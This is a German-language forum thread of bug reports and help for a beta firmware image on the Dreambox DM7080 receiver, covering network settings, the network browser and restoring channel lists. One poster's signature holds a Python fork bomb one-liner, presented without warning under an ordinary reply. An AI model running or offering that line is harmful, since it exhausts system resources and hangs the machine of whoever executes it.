Angepinnt Feedback/Bugs in beta image DM7080 OE2.2

  • Ich habe heute meine 7080 mit dem letzten Image vom 25.02. neu geflascht.
    Irgendwie finde ich den Netzwerkbrowser nicht mehr. Darüber konnte ich mein NAS anbinden. Oder finde ich diesen Punkt in einem anderen Ordner?
    Bilder
    • screenshot1.png

      62,24 kB, 1.280×720, 283 mal angesehen
    WAT, WER BIS DU DENN???
  • Der ist im image nicht installiert musste nachinstallieren wenn du in brauchst weil autofs und den browser macht kein sinn kostet nur platz.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Hab mich hier auch mal angemeldet, um zu berichten. Bin heute vom Oozoon umgestiegen, das ich installiert hatte, nachdem mein letzter Versich mit Newnigma im Dezember aufgrund zahlreicher Bugs in die Hose gegangen war. Einer davon besteht allerdings noch immer:

    Meine 7080 ist per LAN angebunden, die IP wird per DHCP vergeben. Der Startwizard läuft problemlos durch, aber im Netzwerkassistent wird keine Vetbindung oder irgendwelche Einstellungsmöglichkeiten angezeigt. Ergo kann ich den Netzwerkassistenten nur übergehen. Gehe ich dann später über das Einstellungsmenü zu den Netzwerkeinstellungen, ist das Menü auch hier komplett leer und es lässt sich nichts konfigurieren.

    Komischerweise scheint die Box aber im Hintergrund eine IP zu erhalten, denn per FTP kann ich darauf zugreifen und auch Erweiterungen lassen sich online installieren. Das Oozoon hatte dieses Problem nicht...
  • t²6³ schrieb:

    Hab mich hier auch mal angemeldet, um zu berichten. Bin heute vom Oozoon umgestiegen, das ich installiert hatte, nachdem mein letzter Versich mit Newnigma im Dezember aufgrund zahlreicher Bugs in die Hose gegangen war. Einer davon besteht allerdings noch immer:

    Meine 7080 ist per LAN angebunden, die IP wird per DHCP vergeben. Der Startwizard läuft problemlos durch, aber im Netzwerkassistent wird keine Vetbindung oder irgendwelche Einstellungsmöglichkeiten angezeigt. Ergo kann ich den Netzwerkassistenten nur übergehen. Gehe ich dann später über das Einstellungsmenü zu den Netzwerkeinstellungen, ist das Menü auch hier komplett leer und es lässt sich nichts konfigurieren.

    Komischerweise scheint die Box aber im Hintergrund eine IP zu erhalten, denn per FTP kann ich darauf zugreifen und auch Erweiterungen lassen sich online installieren. Das Oozoon hatte dieses Problem nicht...



    das ein bekannter bug der auch dmm bekannt ist schau mal ob ein restart gui langt
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Digi-Bit schrieb:

    Wolte mal fragen ob man die Senderliste und timer von der 8000 irgend wie vom configsaver einspielen kann ?

    Klar die Dateien von Hand mit einem FTP Programm nach /etc/enigma2 kopieren (Inhalt von bouquets und die timers.xml), NeustartGUI dann sollte alles funktionieren.
  • Hallo zusammen,

    ich habe mir am WE das Beta Image auf die DM7080 installiert. Picons und Netzwerkmount haben wunderbar funktioniert.
    Gestern wollte ich mir Fritz!Call über den Feed installieren seitdem habe ich nervige Probleme mit der Dreambox.

    Wenn ich die Box einschalte kommen immer für ca. 5 Minuten die Zahnräder, danach wird erst das Image gestartet. Eine Netzwerkverbindung wird auch nicht gestartet.
    Das Plugin Fritzcall habe ich bereits installiert, brachte jedoch keine Besserung. :(

    Ist das Problem schon bekannt bzw. was kann ich dagegen tun?
    Hat jemand eine Idee?

    Vielen Dank für Eure Tipps?

    Gruß

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Bobic ()

  • Hi Joey,

    danke für Deine Antwort. ich konnte es auch nicht nachvollziehn warum die Box so lange gebootet hat und warum ich keine Netzwerkverbindung mehr hatte.
    Habe das Image neuinstalliert und jetzt funktioniert alles so wie gewünscht

    Gruß